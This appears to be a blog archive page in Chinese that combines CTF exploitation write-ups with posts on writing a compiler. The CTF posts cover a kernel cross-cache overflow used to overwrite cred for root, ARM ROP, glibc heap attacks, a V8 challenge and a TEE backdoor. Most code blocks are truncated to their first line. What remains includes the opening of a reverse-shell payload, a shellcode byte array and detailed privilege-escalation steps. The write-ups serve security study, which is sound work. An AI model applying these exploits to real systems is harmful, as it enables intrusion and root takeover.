基础信息
为了完成工程实践项目写的测试程序
第一版的程序比较简单,只是完成了 “文件上传” 和 “文件下载” 的基础功能,之后更详细的功能都在此版本上进行实现
在下一版本会实现 “目录切换” 的功能,并完成多线程(如果有时间可以弄一个条件竞争的在这里,具体的思路就是 RWCTF2023 NonHeavyFTP,在全局变量中设置服务器根目录,然后通过条件竞争完成逃逸)
客户端
1 |
|
服务端
1 |
|
Cross-Cache Overflow+页级堆风水
cache-of-castaways
1 | !/bin/sh |
- smap,smep,pti
1 | !/bin/sh |
- kptr_restrict
- dmesg_restrict
- perf_event_paranoid
漏洞分析
1 | void __fastcall castaway_ioctl(FILE *fd, int cmd, void *args) |
- 这里的 castaway_cachep 是程序自己分配的 kmem_cache,并且创建 flag 为
SLAB_ACCOUNT,同时开启了CONFIG_MEMCG_KMEM=y - 这意味着这是一个独立的 kmem_cache(与内核自带的 kmem_cache-512 相独立,二者不会相互干扰)
1 |
内核分配 kmem_cache 的代码如下:
1 | void init_module() |
本题目的漏洞就在 castaway_edit 函数中:
1 | void __fastcall castaway_edit(unsigned __int64 index, size_t size, void *from) |
- 有6字节的堆溢出,但是该 kmem_cache 是独立的,它上边的 object 很难溢出到内核自带的 kmem_cache-512 上
- 于是需要另一个技术:Cross-Cache Overflow
Cross-Cache Overflow
Cross-Cache Overflow 本质上是针对 buddy system 完成对 slub 攻击的利用手法
伙伴系统 buddy system 的机制如下:
- 把系统中要管理的物理内存按照页面个数分为了11个组,分别对应11种大小不同的连续内存块,每组中的内存块大小都相等,且必须是2的n次幂 (Pow(2, n)),即 1, 2, 4, 8, 16, 32, 64, 128 … 1024
- 那么系统中就存在 2^0~2^10 这么11种大小不同的内存块,对应内存块大小为 4KB ~ 4M,内核用11个链表来管理11种大小不同的内存块(这11个双向链表都存储在 free_area 中)
- 在操作内存时,经常将这些内存块分成大小相等的两个块,分成的两个内存块被称为伙伴块,采用 “一位二进制数” 来表示它们的伙伴关系(这个 “一位二进制数” 存储在位图 bitmap 中)
- 系统根据该位为 “0” 或位为 “1” 来决定是否使用或者分配该页面块,系统每次分配和回收伙伴块时都要对它们的伙伴位跟 “1” 进行异或运算
Cross-Cache Overflow 就是为了实现跨 kmem_cache 溢出的利用手法:
- slub 底层逻辑是向 buddy system 请求页面后再划分成特定大小 object 返还给上层调用者
- 但内存中用作不同
kmem_cache的页面在内存上是有可能相邻的 - 若我们的漏洞对象存在于页面 A,溢出目标对象存在于页面 B,且 A,B 两页面相邻,则我们便有可能实现跨越不同
kmem_cache之间的堆溢出
Cross-Cache Overflow 需要两个 page 相邻排版,此时又需要使用另一个技术:页级堆风水
页级堆风水
页级堆风水即以内存页为粒度的内存排布方式,而内核内存页的排布对我们来说不仅未知且信息量巨大,因此这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布
伙伴系统采用一个双向链表数组 free_area 来管理各个空闲块,在分配 page 时有如下的逻辑:
- free_area 的每个条目都是一个用于管理 2^n 大小空闲块的双向链表,每个 free_area[x] 都有一个 map 位图(用于表示各个伙伴块的关系)
- 当一个 m page 大小的空间将要被申请时,伙伴系统会首先在 free_area[n] 中查找(刚好满足条件的最小 n)
- 如果 free_area[n] 中有合适的内存块就直接分配出去,如果没有就继续在 free_area[n+1] 中查找
- 如果 free_area[n+1] 中有合适的内存块,就会将其均分为两份:
- 其中一份分配出去
- 另一个插入 free_area[n] 中
- 如果 free_area[n+1] 中也没有合适的内存块,则重复上面的过程,如果到达 free_area 数组的末端则放弃分配
- 如果在 bitmap 中检测到有两个伙伴块都处于空闲状态,则会进行合并,然后插入上级链表
通过伙伴系统的分配流程我们可以发现:互为伙伴块的两片内存块一定是连续的
从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:
- 向 buddy system 请求两份连续的内存页
- 释放其中一份内存页,在
vulnerable kmem_cache上堆喷,让其取走这份内存页 - 释放另一份内存页,在
victim kmem_cache上堆喷,让其取走这份内存页
这样就可以保证 vulnerable kmem_cache 和 victim kmem_cache 就一定是连续的
如果想要完成上述操作,就需要使用 setsockopt 与 pgv 完成页级内存占位与堆风水
setsockopt + pgv
函数 setsockopt 用于任意类型,任意状态套接口的设置选项值,其函数原型如下:
1 | int setsockopt( int socket, int level, int option_name,const void *option_value, size_t ption_len); |
- socket:套接字
- level:被设置的选项的级别(如果想要在套接字级别上设置选项,就必须把 level 设置为 SOL_SOCKET)
- option_name:指定准备设置的“选项”
- option_value:指向存放选项值的缓冲区(用于设置所选“选项”的值)
- ption_len:缓冲区的长度
- 返回值:若无错误发生返回 “0”,否则返回 SOCKET_ERROR 错误(应用程序可通过
WSAGetLastError()获取相应错误代码)
利用步骤如下:
- 创建一个 protocol 为
PF_PACKET的 socket
1 | socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); |
- 先调用
setsockopt将PACKET_VERSION设为TPACKET_V1/TPACKET_V2()
1 | setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)); |
- 再调用
setsockopt提交一个PACKET_TX_RING
1 | req.tp_block_size = size; |
此时便存在如下调用链:
1 | __sys_setsockopt() |
- 在
alloc_pg_vec中会创建一个pgv结构体,用以分配tp_block_nr份 2^order 大小的内存页,其中order由tp_block_size决定
1 | static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) |
- 在
alloc_one_pg_vec_page中会直接调用__get_free_pages向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求
当我们耗尽 buddy system 中的 low order page 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt 便相当于获取到了一块近乎物理连续的内存:
- 不能分配 low order page 时,程序就会从上一级的 free_area 中分配一个内存块
- 然后等分为两个 low order page,这两个 low order page 就是物理连续的
- 在
setsockopt的流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面,产生“噪声”
具体的操作就是利用 setsockopt 申请大量的 1 page 内存块,部分 setsockopt 用于耗尽 low order page,而剩下的就有几率成为连续内存
入侵思路
其实入侵的思路很简单:就是通过这6字节的溢出来覆盖 cred 从而实现提权
结构体 cred 所使用的 kmem_cache 是 cred_jar
cred的大小为 192cred_jar向 buddy system 单次请求 1 page 大小的内存块,足够分配21个cred- 利用系统调用 clone 可以申请新的
cred,从而耗尽cred_jar
具体的利用思路如下:
- 先分配大量的单张内存页,耗尽 buddy 中的 low order page
- 间隔一张内存页释放掉部分单张内存页,之后堆喷
cred,这样便有几率获取到我们释放的单张内存页 - 释放掉之前的间隔内存页,调用漏洞函数分配堆块,这样便有几率获取到我们释放的间隔内存页
- 而间隔的两张内存页又有几率互为伙伴(物理地址连续)
- 最后利用模块中漏洞进行越界写,篡改
cred->uid,完成提权
我们先利用 setsockopt 申请大量的 1 page 内存块,参考函数如下:
1 |
|
- 低权限用户无法使用上述函数,但是我们可以通过开辟新的命名空间来绕过该限制
- 这里需要注意的是我们提权的进程不应当和页喷射的进程在同一命名空间内,因为要在原本的命名空间完成提权
- 因此选择 fork 一个子进程,然后在子进程中开辟命名空间并完成页喷射(通过管道完成父子进程通信)
开辟命令空间的函数如下:
1 | void unshare_setup(void) |
使用系统调用 clone 来耗尽 cred_jar 的函数如下:
1 | __attribute__((naked)) long simple_clone(int flags, int (*fn)(void *)) |
- 本进程的 cred 我们是没有机会覆盖的,我们只能覆盖 clone 进程的 cred
- 然后在主进程中触发溢出去覆盖 clone 进程的 cred,在 clone 进程里面尝试 get root
- clone 后的父进程 ret,子进程则跳转到函数指针 fn,并在该函数中等待 root 权限
等待 root 权限的函数如下:
1 | int waiting_for_root_fn(void *args) |
最后组合一下就可以完成 exp 了
完整 exp 如下:
1 |
|
小结:
学到了 Cross-Cache Overflow 和页级堆风水
编译原理实战-简单编译器7
基础信息
本代码是在以下项目的基础上进行完善:
此版本已经完成了所有功能:全局变量处理,结构体处理,指针处理
语义分析
全局变量处理:
1 | char *newAliasEx() |
结构体处理:
1 | void struct_exp(struct node *T){ |
生成 IR 中间语言
全局变量处理:
1 | if(h->op==NOT && h->result.type_array!=NULL){ |
生成汇编代码
结构体处理:
1 | string Get_S(const string& str){ |
全局变量处理:
1 | string Get_D(const string& str){ |
1 | void write_to_txt(const vector<string>& obj){ |
基础功能已经全部完成,剩下的就是找 BUG 和改 BUG
编译原理实战-简单编译器6
基础信息
本代码是在以下项目的基础上进行完善:
此版本在上一个版本的基础上进行了大修改
语义分析
定义了一个函数用于处理数组中的变量:
1 | void array_exp_tmp(struct node *T,struct node *T0){ |
- 处理的过程比较复杂,核心思路就是添加一条伪代码,用于在数组赋值前说明该数组所引用的变量
- 效果如下:
1 | VAR exvar1(int) |
- 在一个数组中,所有变量对数组所造成的影响都会记录在
tempa中
生成 IR 中间语言
在此部分中添加了生成伪代码的操作:
1 | if(h->op==NOT && h->result.type_array!=NULL){ |
生成汇编代码
此部分进行了大修改:
实现了对函数调用的翻译:(包括参数传入和参数使用)
1 | if (line[0] == "ARG"){ |
实现了对数组赋值的处理:(包括对数组中变量的特殊处理)
1 | if (line[0][0] == '#' && line[0][1] == '!'){ |
实现了条件跳转:
1 | if (line[0] == "IF") { |
实现了“加减乘除”4种基础运算:(其中不包括对带变量数组的处理)
1 | if (line.size() == 5){ |
编译原理实战-简单编译器5
基础信息
本代码是在以下项目的基础上进行完善:
语义分析
先更正一个错误:
1 | void assignop_exp_right(struct node *T,struct opn *opn1){ |
- 赋值语句右边可能是运算表达式,这种情况在上个版本考虑漏了
另外还改了一些 BUG 并进行了优化
生成 IR 中间语言
1 | switch (h->op) |
- 对局部变量的 IR 进行了修改,使其可以显示在栈中的偏移
- 修改了函数标签,使其可以显示该函数使用了多大的栈空间
生成汇编代码
参考了之前 “编译原理实验” 的代码,目前实现了对赋值语句和基础运算的翻译:
1 |
|
- 对于局部变量 “var” 需要存放在栈中,对于临时变量 “temp” 需要存放在寄存器中
下个版本打算先实现函数调用
ARM ROP+shellcode
d3op
1 | qemu-system-aarch64 \ |
1 | !/bin/sh |
说实话本题目有点懵:
1 | root@(none):/# id |
- 看到 root 权限后第一反应是 qemu 逃逸(在阿里云CTF的 wee 那里已经吃过亏了)
1 | root@(none):/ |
- 看到这么多的内核模块,起初以为是 ARM 内核题目,但使用
find . -regex ".*\.ok"查找不到内核模块
使用 sudo mount squashfs-root.img rootfs 挂载镜像,发现里面有 www 目录,猜测该程序可能是一个服务器,但不知道从何处入手
漏洞分析
本题目的漏洞在二进制文件 base64 中:
1 | root@(none):/ |
- 程序提供了一个 base64 加解密功能,底层使用的文件就是
base64
其漏洞藏在函数 sub_4061AC 中:
1 | __int64 __fastcall sub_4061AC(__int64 a1, __int64 a2) |
- 栈溢出漏洞
至于程序怎么到达这个函数我不是很清楚,但按照如下 mygdbinit 进行操作就可以到达:
1 | target remote :1234 |
此时用于调试的 exp 如下:
1 | # -*- coding:utf-8 -*- |
然后在两个 shell 中分别执行如下命令,就可以开始调试了:
1 | python exp.py |
入侵思路
有一个无限栈溢出,于是思路就很简单:
- 使用一个 ROP 执行 mprotect 修改权限
- 然后执行 ORW 的 shellcode
本题目的难点在于:
- 在 ARM 架构下的静态文件中,找下合适的 Gadget
可以在 IDA 中使用 ALT + B 来查找二进制代码:
最开始是想找 csu_gadget,在发现没有后就找了两个和它接近的 gadget:
1 | .text:0000000000407380 loc_407380 ; CODE XREF: sub_4072F4+D4↓j |
1 | .text:000000000043EAAC loc_43EAAC ; CODE XREF: sub_43EA60+A0↓j |
这里 gadget 缺少对第一个参数 X0 的控制,因此需要第三个 gadget:
1 | .text:000000000041F0C0 E0 03 16 2A MOV W0, W22 |
拼接这3个 gadget,写出组合函数:
1 | def ret2csu(func_addr, ret_addr ,arg0, arg1, arg2): |
反复调试校对数据,最终就可以写入最终 exp:
1 | # -*- coding:utf-8 -*- |
小结:
很久都没有尝试过 ARM 的 ROP 了,通过这个题目复习了一下
长城杯CTF2023
driverlicense
1 | GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release version 2.23, by Roland |
1 | driverlicense: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/Tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so, for GNU/Linux 2.6.32, BuildID[sha1]=9037e29de632f174a7c4a576165ac940f38a33c3, stripped |
- 64位,dynamically,Partial RELRO,Canary,NX
漏洞分析
1 | v3 = std::operator<<<std::char_traits<char>>((__int64)&std::cout, (__int64)"Please input driverlicense information:"); |
- cpp 的
cin >>有一层最基础的逻辑:- 先申请固定大小的 chunk,如果写入数据的长度超过了该 chunk,则会释放掉它并申请一个更大的 chunk
- 如果写入的数据太小,则不会申请 chunk
1 | __int64 __fastcall add(__int64 a1) |
- 程序默认
cin >>已经创造了 chunk - 如果
cin >>没有创造 chunk,则std::string::c_str会获取到栈中的数据,从而造成栈溢出
入侵思路
利用栈溢出就可以覆盖栈上的指针,从而导致任意地址读,于是我们就可以通过 GOT 表完成泄露(需要分多段进行泄露)
1 | name = "a"*3 |
比赛时卡在了泄露 canary 这一步,后来经过队友的提醒想起来了通过 libc 泄露 stack 的方法:
- 通过全局变量
_environ来泄露栈地址 - 通过栈地址来泄露 canary
1 | environ = libc_base + libc.sym['_environ'] |
最后直接劫持返回地址就可以了
完整 exp:
1 | # -*- coding:utf-8 -*- |
fast_emulator
1 | fast_emulator: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=847bef575e01063e3c4c97226350955708b76d20, for GNU/Linux 3.2.0, not stripped |
- 64位,dynamically,Partial RELRO,NX,PIE
漏洞分析
1 | __int64 __fastcall call_code(__int64 (*a1)(void)) |
- 有后门,多半是执行 shellcode
1 | memset(hex, 0, sizeof(hex)); |
from_hex限制的长度远超 mov 指令所需要的长度
1 | sla("enter: ",str(0x64)) |
1 | ► 0x563401dc56b5 <write_code+453> call memcpy@plt <memcpy@plt> |
1 | ► 0x7f0c61bcf000 add rax, rbx |
1 | pwndbg> telescope 0x7f0c61bcf000 |
- 溢出的部分没法被 mov 识别,而是作为二进制代码加入程序的执行
入侵思路
可以任意执行 shellcode,不过程序的溢出有限需要分段进行
最后还有一个问题就是如何写入 “/bin/sh”,仔细观察寄存器的值可以发现方法:
1 | RAX 0xffffffff90909090 |
- 经过调试发现:RBP 寄存器中存放的数据为最后一次写入的指令
- 我们可以写入一个
push rbp + pop rdi的组合获取 “/bin/sh”
完整 exp 如下:
1 | # -*- coding:utf-8 -*- |
编译原理实战-简单编译器4
基础信息
本代码是在以下项目的基础上进行完善:
上一个版本已经实现了结构体,此版本主要实现指针
语法分析
1 | VarDec: ID {$$=mknode(ID,NULL,NULL,NULL,yylineno);strcpy($$->type_id,$1);} |
- 把指针 IDP 当成 ID 处理即可
1 | | STAR ID {$$=mknode(EXP_IDS,$2,NULL,NULL,yylineno);strcpy($$->type_id,$2);} |
- 在 Exp 中添加对应的规则(用于识别
&a和*a) - PS:这里使用的是 ID,这就意味着结构体中的指针没法被识别(暂时不做修改)
语义分析
指针声明(全局)
1 | case IDS: |
- 和 ID 类似的处理方式
指针声明(局部)
1 | if (T0->ptr[0]->kind == ID || T0->ptr[0]->kind == IDS){ |
- 和 ID 一起处理,但遇到结构体指针时需要特殊处理
指针的使用
上一个版本的赋值语句处理很乱,此版本进行了统一编排,使程序看上去更简洁了:
1 | void array_exp_left(struct node *T,struct opn *result){ |
- 先处理等号左边,后处理等号右边
另外还改了一些 BUG
生成 IR 中间语言
这里只针对于指针做出了小幅修改:
1 | case IDS: |
WIDC车联网2023
mydear
1 | mydear: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=82718c0b9f830007c1abfa77aae3858dd215e8ef, not stripped |
- 64位,dynamically,全关
漏洞分析
1 | int __cdecl main(int argc, const char **argv, const char **envp) |
- 栈溢出
1 | int win() |
- 有后门
入侵思路
完整 exp 如下:
1 | from pwn import * |
easy_heap
1 | GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27 |
1 | easy_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=cd9a9a43d1011968219ce1d0acd1aa14deeaf80f, not stripped |
- 64位,dynamically,全开
漏洞分析
1 | unsigned __int64 delete() |
- UAF
入侵思路
利用 UAF 完成泄露:
1 | add(0x410,1,'a'*0x50) |
然后填满 tcache,打 fastbin double free 即可
完整 exp:
1 | # -*- coding:utf-8 -*- |
inuse
1 | GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31 |
1 | inuse: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/Tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=f2e3e36e0bf161ac1c1b5c561aa2518134caa471, not stripped |
- 64位,dynamically,全开
漏洞分析
1 | unsigned __int64 dele() |
- UAF
libc 版本下载
本题目的 GLIBC 不常规,需要先下载其 debug 包:
在上面的网站中找到对应的版本:
选择 Builds 中对应的架构:
选择 dbg 文件,并进行下载:
- PS:最好不要在 win 中解压
解压后会出现1个文件夹,其中 /usr/lib/debug 就是我们需要的
1 | data.tar usr |
目录 debug 的结构如下:(这些动态链接库都是带有符号的)
1 | ➜ debug tree |
于是我们直接把 x86_64-linux-gnu 改名为 .debug,并且在 GDB 命令中指定它为 debug-file-directory:
1 | # -*- encoding: utf-8 -*- |
入侵思路
1 | unsigned __int64 edit() |
- 本题目在 “修改模块” 之后会自动清空 free_hook 和 malloc_hook
- 因此可以把此题目当成是高版本 Libc 的堆利用
在高版本 Libc 的利用中,最常见的方法就是打 IO,因此我首先尝试 house of cat:
1 | # -*- encoding: utf-8 -*- |
不过这个题目没法打 IO,先看下调试信息:
1 | pwndbg> telescope 0x7f4db40c8780 |
- 这个保护以前见过一次,程序将不会使用 libc 中的
_IO_FILE结构体,而是使用保存在 elf 程序中的_IO_FILE结构体备份
1 | pwndbg> p _IO_list_all |
1 | ─────────────────────────────────[ REGISTERS ]────────────────────────────────── |
_IO_list_all已经成功被我们覆盖,但是程序并没有受到影响- 而
_IO_FILE将会保存在 elf 文件中
1 | pwndbg> search -t qword 0x7f4db40c85c0 |
- 为了验证这个过程,我们在 GDB 中修改备份的
_IO_FILE,看看是否会产生变化
1 | pwndbg> p _IO_list_all |
1 | *RAX 0x556b42802060 ◂— 0x7ff5ffffffff |
面对高版本 Libc 时,还有一种泄露思路:
- 利用 tcache attack 劫持
_IO_2_1_stdout_ - 进行第一次 stdout 任意读,利用 Libc 全局变量 environ 来泄露栈地址
- 进行第二次 stdout 任意读,利用 stack 中的数据来泄露程序基地址
- 注意:这里是直接劫持
_IO_2_1_stdout_本身,而不是指向它的指针
在拥有了程序基地址后,其实我们可以考虑继续使用 house of cat 完成入侵,但此时劫持全局变量 freehk 和 mallochk 才是最优解
1 | .data:0000000000202018 public freehk |
stdout 任意读的条件如下:
- 设置
_flag &~ _IO_NO_WRITES即_flag &~ 0x8 - 设置
_flag & _IO_CURRENTLY_PUTTING即_flag | 0x800 - 设置
_fileno为1 - 设置
_IO_write_base指向想要泄露的地方 - 设置
_IO_write_ptr指向泄露结束的地址 - 设置
_IO_read_end等于_IO_write_base或设置_flag & _IO_IS_APPENDING(即_flag | 0x1000) - 设置
_IO_write_end等于_IO_write_ptr(非必须)
完整 exp 如下:
1 | # -*- encoding: utf-8 -*- |
AliyunCTF2023
babyheap
1 | GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.\n |
1 | babyheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e6f75306cf2d7daa795a02761ead04102edfcc4c, with debug_info, not stripped |
- 64位,Full RELRO,NX,PIE
漏洞分析
1 | void __cdecl babyheap::backdoor::haad830f8bf071aae(babyheap::HouseTbl *tbl, i32 i) |
- 在 “删除模块” 中有一个后门函数,要求
i==0x74737572时触发后门
入侵思路
执行 dele(0x74737572) 有堆溢出,利用这个溢出可以完成泄露,并写 tcache->fd
1 | # -*- coding:utf-8 -*- |
wee-dist
先截两张图,用来表示我的疑惑:
内核信息如下:
1 | !/bin/bash |
1 | !/bin/sh |
比赛时被同名的 misc 题目给误导了,以为要打内核:
1 | diff --git a/core/include/tee/tee_svc.h b/core/include/tee/tee_svc.h |
实际上本题主要涉及到几个 python encoding 的问题
漏洞分析
1 | for line in lines[1:]: |
- python re 模块的
\d通配符以及 int 函数会接受所有 unicode 数字作为输入
在 secure_sig 中含有后门:
1 | .text:00000D34 6D E9 02 7E STRD.W R7, LR, [SP,#-8]! |
1 | int sub_D34() |
- 可以执行
/tmp/rce
入侵思路
在二进制程序 secure_sig 中含有后门,可以执行 /tmp/rce
因此我们要先利用 handle_sign_message 往 /tmp/rce 中写入攻击脚本(最好是反弹 shell),不过这里有一个细节需要注意:
1 | with open(sig_file, "wb") as f: |
- 程序会调用
sign_message
1 | TEE_SECURE_SIG = "/usr/bin/secure_sig" |
subprocess.Popen会打开并执行二进制程序secure_sig,在其中会对写入的数据进行加密
函数 decode 默认使用 UTF-8 编码,如果字符串中包含大于 0x7f 的字符且不符合 UTF-8 的格式,会报错,从而不执行二进制程序 secure_sig 里面的文件覆盖操作
写入任意文件的脚本如下:
1 | s = '''python3 -c 'import socket,subprocess,os; |
- 该文件会获取一个反弹 shell
- 另外还需要注意一个细节,python encode 使用的默认编码方式是 UTF-8,如果遇到不合法的 UTF-8 字符,就会将其强行拆解为两个合法的字符:
1 | print(mess.encode("latin")) |
1 | print(mess.encode()) |
- 因此我们需要使用范围更大的 latin 编码
接下来就要在 secure_sig 中找寻漏洞,并执行后门函数,先看看传入的参数是什么:
1 | def check_signature(self, cl, body, sig): |
根据 check_signature 函数,我们可以写出类似的脚本进行调试:
1 | # -*- coding:utf-8 -*- |
- PS:其实调试出了一些问题,报了以下的错误(猜测是 TEEC 的原因,目前不知道怎么解决)
1 | secure_sig1: TEEC_InitializeContext(NULL, x): 0xffff0008 |
由于没法调试,因此最后的栈溢出过程没法复现了,完整 exp 如下:
1 | #!/usr/bin python3 |
dddddddd
V8 的 misc 题目
预期解
1 | From a5d68c2f29d0f688e3a5145c35111c4e491e4e37 Mon Sep 17 00:00:00 2001 |
- D8 Shell 里的 d8.serializer 没有删掉
- 补丁带回了以前 V8 里 ValueSerializer 反序列化 WasmModule 的功能
Wasm(WebAssembly) 是一种底层的汇编语言,能够在所有当代桌面浏览器及很多移动浏览器中以接近本地的速度运行
官方 exp 如下:
1 | const shellCode = new Uint8Array([0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x2e, 0x67, 0x6d, 0x60, 0x66, 0x1, 0x1, 0x1, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0xf, 0x5, 0x41, 0xba, 0xff, 0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x1, 0x5f, 0x99, 0xf, 0x5]); |
非预期解
本程序 ban 了 read,load 但还有一个 import 可以使用,所以直接:
1 | import("./flag") |
OOBdetection
本题目的意思就是提供一些代码,需要快速识别该代码中是否有漏洞,并说明漏洞类型
核心思路就是利用 clang 现成的检查机制来进行判断,因此需要把程序输出的代码写入 1.c 文件中,然后执行 clang:
1 | #! /usr/bin/env python2 |